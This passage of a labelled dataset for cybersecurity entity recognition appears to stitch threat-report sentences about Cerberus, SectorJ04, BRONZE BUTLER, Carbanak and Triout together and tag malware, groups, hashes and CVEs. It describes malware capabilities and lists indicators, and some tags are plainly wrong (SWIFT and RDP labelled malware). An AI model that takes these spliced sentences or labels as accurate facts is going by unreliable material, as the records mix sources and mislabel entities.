{"start": 511, "end": 519, "label": "Vulnerability"}, {"start": 520, "end": 527, "label": "Vulnerability"}, {"start": 653, "end": 664, "label": "Organization"}]} {"text": "The commands supported by the analyzed version of the Cerberus bot are listed below . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . 
The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" .", "spans": [{"start": 54, "end": 62, "label": "Malware"}, {"start": 93, "end": 102, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}]} {"text": "As can be seen , the possibilities offered by the bot are pretty common . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 78, "end": 87, "label": "Organization"}, {"start": 180, "end": 194, "label": "Malware"}, {"start": 195, "end": 204, "label": "Malware"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}, {"start": 355, "end": 371, "label": "Organization"}, {"start": 389, "end": 407, "label": "System"}, {"start": 408, "end": 416, "label": "Vulnerability"}, {"start": 433, "end": 446, "label": "Vulnerability"}, {"start": 493, "end": 499, "label": "Malware"}]} {"text": "Command Description push Shows a push notification . The SectorJ04 group\u2019s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . 
Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 100, "end": 122, "label": "Organization"}, {"start": 301, "end": 308, "label": "Organization"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 347, "end": 360, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}, {"start": 417, "end": 435, "label": "System"}, {"start": 436, "end": 444, "label": "Vulnerability"}, {"start": 461, "end": 474, "label": "Vulnerability"}, {"start": 521, "end": 527, "label": "Malware"}]} {"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking . 
BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": [{"start": 605, "end": 614, "label": "Organization"}, {"start": 654, "end": 664, "label": "System"}, {"start": 669, "end": 683, "label": "System"}, {"start": 700, "end": 710, "label": "Organization"}, {"start": 779, "end": 787, "label": "Organization"}]} {"text": "Calls the specified USSD code openUrl Opens the specified URL in the WebView getSMS Gets all text messages from the infected device killMe Triggers the kill switch for the bot updateModule Updates the payload module Cerberus features Cerberus malware has the same capabilities as most other Android banking Trojans such as the use of overlay attacks , SMS control and contact list harvesting . SectorJ04 also used the Remote Manipulator System (RMS) RAT , a legitimate remote management software created in Russia . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 216, "end": 224, "label": "Malware"}, {"start": 234, "end": 242, "label": "Malware"}, {"start": 291, "end": 298, "label": "System"}, {"start": 394, "end": 403, "label": "Organization"}, {"start": 418, "end": 443, "label": "System"}, {"start": 516, "end": 529, "label": "Organization"}, {"start": 546, "end": 559, "label": "Organization"}, {"start": 564, "end": 568, "label": "Organization"}, {"start": 644, "end": 663, "label": "Organization"}, {"start": 676, "end": 683, "label": "Organization"}, {"start": 706, "end": 719, "label": "Organization"}, {"start": 722, "end": 747, "label": "Organization"}, {"start": 754, "end": 774, "label": "Organization"}]} {"text": "The Trojan can also leverage keylogging to broaden the attack scope . 
Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 118, "end": 127, "label": "Organization"}, {"start": 206, "end": 215, "label": "System"}, {"start": 218, "end": 231, "label": "Organization"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 329, "end": 348, "label": "Organization"}, {"start": 369, "end": 382, "label": "Organization"}, {"start": 385, "end": 410, "label": "Organization"}, {"start": 417, "end": 437, "label": "Organization"}]} {"text": "Overall , Cerberus has a pretty common feature list and although the malware seems to have been written from scratch there does not seem to be any innovative functionality at this time . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 405, "end": 420, "label": "Indicator"}]} {"text": "For example , some of the more advanced banking Trojans now offer features such as a back-connect proxy , screen-streaming and even remote control . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker\u2019s server . 
In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 149, "end": 158, "label": "Organization"}, {"start": 216, "end": 223, "label": "System"}, {"start": 228, "end": 239, "label": "System"}, {"start": 385, "end": 395, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 539, "end": 554, "label": "Indicator"}]} {"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . 
Secureworks\u00ae incident responders and Counter Threat Unit\u2122 ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 621, "end": 630, "label": "Organization"}, {"start": 804, "end": 816, "label": "Organization"}, {"start": 864, "end": 867, "label": "Organization"}, {"start": 926, "end": 939, "label": "Organization"}, {"start": 956, "end": 960, "label": "Organization"}]} {"text": "Notifications : Push notifications C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Architecture : Modular Overlay attack Most Android banking Trojans use overlay attacks to trick the victim into providing their personal information ( such as but not limited to : credit card information , banking credentials , mail credentials ) and Cerberus is no exception . The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . 
Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms .", "spans": [{"start": 433, "end": 441, "label": "Malware"}, {"start": 464, "end": 477, "label": "Malware"}, {"start": 478, "end": 497, "label": "Malware"}, {"start": 752, "end": 757, "label": "Organization"}, {"start": 910, "end": 934, "label": "Organization"}]} {"text": "In this particular case , the bot abuses the accessibility service privilege to obtain the package name of the foreground application and determine whether or not to show a phishing overlay window , as shown in the following code snippet : Targets Some examples of phishing overlays are shown below . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": [{"start": 331, "end": 338, "label": "System"}, {"start": 364, "end": 375, "label": "System"}, {"start": 403, "end": 412, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 476, "end": 484, "label": "Malware"}, {"start": 489, "end": 497, "label": "Malware"}, {"start": 518, "end": 524, "label": "Malware"}, {"start": 529, "end": 535, "label": "Malware"}]} {"text": "They exist in two types : the credentials stealers ( first 2 screenshots ) and the credit card grabbers ( last screenshot ) . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . 
BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": [{"start": 141, "end": 150, "label": "Organization"}, {"start": 213, "end": 226, "label": "Organization"}, {"start": 275, "end": 281, "label": "System"}]} {"text": "The only active target list observed in the wild is available in the appendix and contains a total of 30 unique targets . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 148, "end": 157, "label": "Organization"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 326, "end": 334, "label": "Vulnerability"}]} {"text": "It is interesting to observe that the actual target list contains : 7 French banking apps 7 U.S. banking apps 1 Japanese banking app 15 non-banking apps This uncommon target list might either be the result of specific customer demand , or due to some actors having partially reused an existing target list . Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers . 
The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 328, "end": 337, "label": "Organization"}, {"start": 410, "end": 422, "label": "System"}, {"start": 467, "end": 472, "label": "System"}, {"start": 477, "end": 490, "label": "System"}, {"start": 508, "end": 522, "label": "System"}, {"start": 617, "end": 625, "label": "Vulnerability"}]} {"text": "Conclusion Although not yet mature enough to provide the equivalent of a full-blown set of Android banking malware features ( such as RAT , RAT with ATS ( Automated Transaction Script ) , back-connect proxy , media streaming ) , or providing an exhaustive target list , Cerberus should not be taken lightly . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 91, "end": 98, "label": "System"}, {"start": 270, "end": 278, "label": "Malware"}, {"start": 335, "end": 346, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}, {"start": 549, "end": 555, "label": "System"}, {"start": 561, "end": 566, "label": "System"}, {"start": 613, "end": 619, "label": "Malware"}, {"start": 620, "end": 627, "label": "Malware"}, {"start": 653, "end": 658, "label": "System"}, {"start": 659, "end": 667, "label": "Vulnerability"}]} {"text": "Due to the current absence of maintained and supported Android banking Malware-as-a-Service in the underground community , there is a certainly demand for a new service . 
The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 398, "end": 404, "label": "System"}, {"start": 410, "end": 415, "label": "System"}, {"start": 462, "end": 468, "label": "Malware"}, {"start": 469, "end": 476, "label": "Malware"}, {"start": 502, "end": 507, "label": "System"}, {"start": 508, "end": 516, "label": "Vulnerability"}]} {"text": "Cerberus is already capable to fulfill this demand . In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 63, "end": 72, "label": "Organization"}, {"start": 302, "end": 315, "label": "Organization"}, {"start": 352, "end": 360, "label": "Malware"}, {"start": 365, "end": 368, "label": "Malware"}]} {"text": "In addition to the feature base it already possesses and the money that can be made from the rental , it could evolve to compete with the mightiest Android banking Trojans . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . 
While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 148, "end": 155, "label": "System"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 351, "end": 364, "label": "Organization"}, {"start": 377, "end": 390, "label": "Organization"}, {"start": 432, "end": 443, "label": "Organization"}, {"start": 455, "end": 468, "label": "Organization"}, {"start": 535, "end": 548, "label": "Vulnerability"}]} {"text": "Next to the features , we expect the target list to be expanded to contain additional ( banking ) apps in the near future . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 165, "end": 175, "label": "System"}, {"start": 180, "end": 190, "label": "System"}, {"start": 250, "end": 257, "label": "System"}, {"start": 262, "end": 273, "label": "System"}, {"start": 315, "end": 326, "label": "Organization"}, {"start": 358, "end": 371, "label": "Organization"}, {"start": 438, "end": 451, "label": "Vulnerability"}]} {"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! 
AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": [{"start": 142, "end": 150, "label": "Malware"}, {"start": 200, "end": 221, "label": "Malware"}, {"start": 222, "end": 232, "label": "System"}, {"start": 237, "end": 247, "label": "System"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 396, "end": 399, "label": "Organization"}, {"start": 424, "end": 432, "label": "Malware"}, {"start": 444, "end": 457, "label": "Organization"}, {"start": 467, "end": 475, "label": "Malware"}]} {"text": "Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . 
BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": [{"start": 36, "end": 44, "label": "Malware"}, {"start": 108, "end": 120, "label": "System"}, {"start": 121, "end": 145, "label": "Indicator"}, {"start": 146, "end": 210, "label": "Indicator"}, {"start": 211, "end": 223, "label": "System"}, {"start": 224, "end": 249, "label": "Indicator"}, {"start": 250, "end": 314, "label": "Indicator"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 669, "end": 682, "label": "Organization"}, {"start": 720, "end": 734, "label": "Organization"}]} {"text": "Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . 
Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 13, "end": 34, "label": "Indicator"}, {"start": 35, "end": 99, "label": "Indicator"}, {"start": 100, "end": 112, "label": "System"}, {"start": 113, "end": 139, "label": "Indicator"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 205, "end": 217, "label": "System"}, {"start": 218, "end": 246, "label": "Indicator"}, {"start": 260, "end": 269, "label": "Organization"}, {"start": 353, "end": 363, "label": "System"}, {"start": 368, "end": 383, "label": "System"}, {"start": 574, "end": 582, "label": "Organization"}]} {"text": "cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . 
Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 77, "label": "System"}, {"start": 78, "end": 100, "label": "Indicator"}, {"start": 101, "end": 165, "label": "Indicator"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 426, "end": 434, "label": "Malware"}, {"start": 477, "end": 484, "label": "Malware"}]} {"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa Bank of America This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company\u2019s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . 
Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": [{"start": 64, "end": 83, "label": "Indicator"}, {"start": 84, "end": 95, "label": "System"}, {"start": 96, "end": 137, "label": "Indicator"}, {"start": 138, "end": 144, "label": "System"}, {"start": 145, "end": 184, "label": "Indicator"}, {"start": 185, "end": 191, "label": "System"}, {"start": 192, "end": 213, "label": "Indicator"}, {"start": 214, "end": 226, "label": "System"}, {"start": 227, "end": 244, "label": "Indicator"}, {"start": 245, "end": 271, "label": "System"}, {"start": 272, "end": 300, "label": "Indicator"}, {"start": 301, "end": 320, "label": "System"}, {"start": 321, "end": 342, "label": "Indicator"}, {"start": 343, "end": 348, "label": "System"}, {"start": 349, "end": 370, "label": "Indicator"}, {"start": 371, "end": 374, "label": "System"}, {"start": 401, "end": 417, "label": "Indicator"}, {"start": 418, "end": 433, "label": "System"}, {"start": 550, "end": 559, "label": "Organization"}, {"start": 721, "end": 730, "label": "Organization"}, {"start": 754, "end": 762, "label": "Organization"}, {"start": 831, "end": 844, "label": "Organization"}]} {"text": "Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One\u00ae Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea\u2019s media , manufacturing and universities , around February and March 2019 . 
In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": [{"start": 15, "end": 35, "label": "Indicator"}, {"start": 40, "end": 71, "label": "Indicator"}, {"start": 72, "end": 95, "label": "Indicator"}, {"start": 96, "end": 115, "label": "System"}, {"start": 116, "end": 153, "label": "Indicator"}, {"start": 154, "end": 158, "label": "System"}, {"start": 159, "end": 187, "label": "Indicator"}, {"start": 188, "end": 205, "label": "System"}, {"start": 206, "end": 226, "label": "Indicator"}, {"start": 227, "end": 235, "label": "System"}, {"start": 236, "end": 250, "label": "Indicator"}, {"start": 251, "end": 257, "label": "System"}, {"start": 258, "end": 277, "label": "Indicator"}, {"start": 278, "end": 285, "label": "System"}, {"start": 286, "end": 297, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 303, "end": 331, "label": "Indicator"}, {"start": 332, "end": 343, "label": "System"}, {"start": 344, "end": 373, "label": "Indicator"}, {"start": 403, "end": 417, "label": "Indicator"}, {"start": 418, "end": 423, "label": "System"}, {"start": 424, "end": 447, "label": "Indicator"}, {"start": 448, "end": 457, "label": "Organization"}, {"start": 550, "end": 555, "label": "Organization"}, {"start": 558, "end": 571, "label": "Organization"}, {"start": 576, "end": 588, "label": "Organization"}, {"start": 644, "end": 653, "label": "Organization"}, {"start": 675, "end": 722, "label": "Malware"}, {"start": 725, "end": 730, "label": "Malware"}]} {"text": "Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail \u2013 Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank \u697d\u5929\u9280\u884c -\u500b\u4eba\u306e\u304a\u5ba2\u69d8\u5411\u3051\u30a2\u30d7\u30ea mobi.societegenerale.mobile.lappli L \u2019 Appli Soci\u00e9t\u00e9 
G\u00e9n\u00e9rale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 19, "end": 31, "label": "Indicator"}, {"start": 32, "end": 40, "label": "System"}, {"start": 41, "end": 77, "label": "Indicator"}, {"start": 78, "end": 88, "label": "System"}, {"start": 107, "end": 135, "label": "Indicator"}, {"start": 136, "end": 142, "label": "System"}, {"start": 153, "end": 181, "label": "Indicator"}, {"start": 182, "end": 191, "label": "System"}, {"start": 192, "end": 222, "label": "Indicator"}, {"start": 241, "end": 275, "label": "Indicator"}, {"start": 303, "end": 328, "label": "Indicator"}, {"start": 353, "end": 384, "label": "Indicator"}, {"start": 385, "end": 391, "label": "Malware"}, {"start": 412, "end": 421, "label": "Organization"}, {"start": 542, "end": 552, "label": "Organization"}, {"start": 600, "end": 608, "label": "Indicator"}, {"start": 614, "end": 622, "label": "Malware"}, {"start": 635, "end": 644, "label": "Organization"}]} {"text": "for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . 
If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 352, "end": 360, "label": "Malware"}, {"start": 373, "end": 380, "label": "Vulnerability"}, {"start": 406, "end": 413, "label": "System"}, {"start": 419, "end": 426, "label": "System"}, {"start": 441, "end": 448, "label": "System"}, {"start": 457, "end": 464, "label": "System"}, {"start": 479, "end": 486, "label": "System"}, {"start": 491, "end": 498, "label": "System"}, {"start": 507, "end": 514, "label": "System"}, {"start": 529, "end": 542, "label": "Vulnerability"}]} {"text": "The proliferation of Android devices \u2013 from smartphones to tablets and smart TVs \u2013 has opened up new possibilities for malware developers , as all these devices pack microphones , cameras and location-tracking hardware they can turn into the perfect spy tools . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 454, "end": 477, "label": "Malware"}, {"start": 480, "end": 483, "label": "Malware"}, {"start": 488, "end": 496, "label": "Malware"}]} {"text": "Bitdefender researchers have identified a new Android spyware , dubbed Triout , which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications . 
In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 46, "end": 53, "label": "System"}, {"start": 71, "end": 77, "label": "Malware"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 343, "end": 355, "label": "Organization"}, {"start": 358, "end": 369, "label": "Organization"}, {"start": 374, "end": 388, "label": "Organization"}, {"start": 406, "end": 414, "label": "Malware"}]} {"text": "Found bundled with a repackaged app , the spyware \u2019 s surveillance capabilities involve hiding its presence on the device , recording phone calls , logging incoming text messages , recoding videos , taking pictures and collecting GPS coordinates , then broadcasting all of that to an attacker-controlled C & C ( command and control ) server . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": [{"start": 230, "end": 233, "label": "System"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 657, "end": 665, "label": "Malware"}]} {"text": "It \u2019 s interesting that Triout , which is detected by Bitdefender \u2019 s machine learning algorithms , was first submitted from Russia , and most scans/reports came from Israel . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . 
Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": [{"start": 24, "end": 30, "label": "Malware"}, {"start": 54, "end": 65, "label": "Organization"}, {"start": 349, "end": 357, "label": "Malware"}, {"start": 358, "end": 367, "label": "Organization"}]} {"text": "The sample \u2019 s first appearance seems to be May 15 , 2018 , when it was uploaded to VirusTotal , but it \u2019 s unclear how the tainted sample is disseminated . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}, {"start": 314, "end": 318, "label": "Organization"}]} {"text": "Third-party marketplaces or some other attacker-controlled domains are likely used to host the sample . Now , Silence is one of the most active threat actors targeting the financial sector . 
As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 253, "end": 261, "label": "Organization"}, {"start": 276, "end": 280, "label": "Organization"}]} {"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( \u201c content : //call_log/calls \u201d , info : callname , callnum , calldate , calltype , callduration Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . 
We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 217, "end": 228, "label": "Indicator"}, {"start": 233, "end": 245, "label": "Indicator"}, {"start": 319, "end": 330, "label": "Indicator"}, {"start": 388, "end": 414, "label": "Indicator"}, {"start": 522, "end": 530, "label": "Organization"}, {"start": 655, "end": 665, "label": "Organization"}, {"start": 703, "end": 711, "label": "Malware"}, {"start": 778, "end": 787, "label": "Organization"}, {"start": 828, "end": 846, "label": "Organization"}, {"start": 870, "end": 879, "label": "Organization"}]} {"text": ") to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": [{"start": 13, "end": 24, "label": "Indicator"}, {"start": 130, "end": 138, "label": "Indicator"}, {"start": 144, "end": 152, "label": "Indicator"}, {"start": 153, "end": 165, "label": "Indicator"}, {"start": 177, "end": 180, "label": "System"}, {"start": 204, "end": 212, "label": "Indicator"}, {"start": 370, "end": 377, "label": "Organization"}, {"start": 512, "end": 516, "label": "Organization"}, {"start": 530, "end": 533, "label": "Malware"}]} {"text": "January 23 , 